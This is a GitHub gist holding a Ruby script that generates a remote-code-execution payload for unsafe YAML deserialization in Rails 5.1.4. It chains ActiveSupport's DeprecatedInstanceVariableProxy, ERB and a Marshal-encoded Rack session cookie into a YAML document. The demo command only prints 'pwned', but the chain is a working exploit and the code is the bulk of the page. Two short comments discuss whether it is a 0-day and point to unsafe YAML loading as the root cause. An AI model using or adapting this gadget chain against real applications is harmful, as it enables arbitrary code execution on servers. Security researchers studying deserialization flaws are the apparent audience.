Create a gist now

Instantly share code, notes, and snippets.

Embed
Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy
def initialize(instance, method)
@instance = instance
@method = method
@deprecator = ActiveSupport::Deprecation.new
end
end
end
end
code = <<-EOS
puts "pwned"
EOS
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@lineno, 1337
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "")
payload = <<-PAYLOAD
---
!ruby/object:Gem::Requirement
requirements:
!ruby/object:Rack::Session::Abstract::SessionHash
req: !ruby/object:Rack::Request
env:
"rack.session": !ruby/object:Rack::Session::Abstract::SessionHash
id: 'hi from espr'
HTTP_COOKIE: "a=#{payload}"
store: !ruby/object:Rack::Session::Cookie
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
key: a
secrets: []
exists: true
loaded: false
PAYLOAD
puts payload
@RicterZ

This comment has been minimized.

Show comment
Hide comment
@RicterZ

RicterZ Nov 21, 2017

A 0-day? I couldn't find any information about this security issue on Rails official website or Github.

RicterZ commented Nov 21, 2017

A 0-day? I couldn't find any information about this security issue on Rails official website or Github.

@niklasb

This comment has been minimized.

Show comment
Hide comment
@niklasb

niklasb May 31, 2018

@RicterZ If you load untrusted YAML without safe mode you have a security issue regardless of this payload

Owner

niklasb commented May 31, 2018

@RicterZ If you load untrusted YAML without safe mode you have a security issue regardless of this payload

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment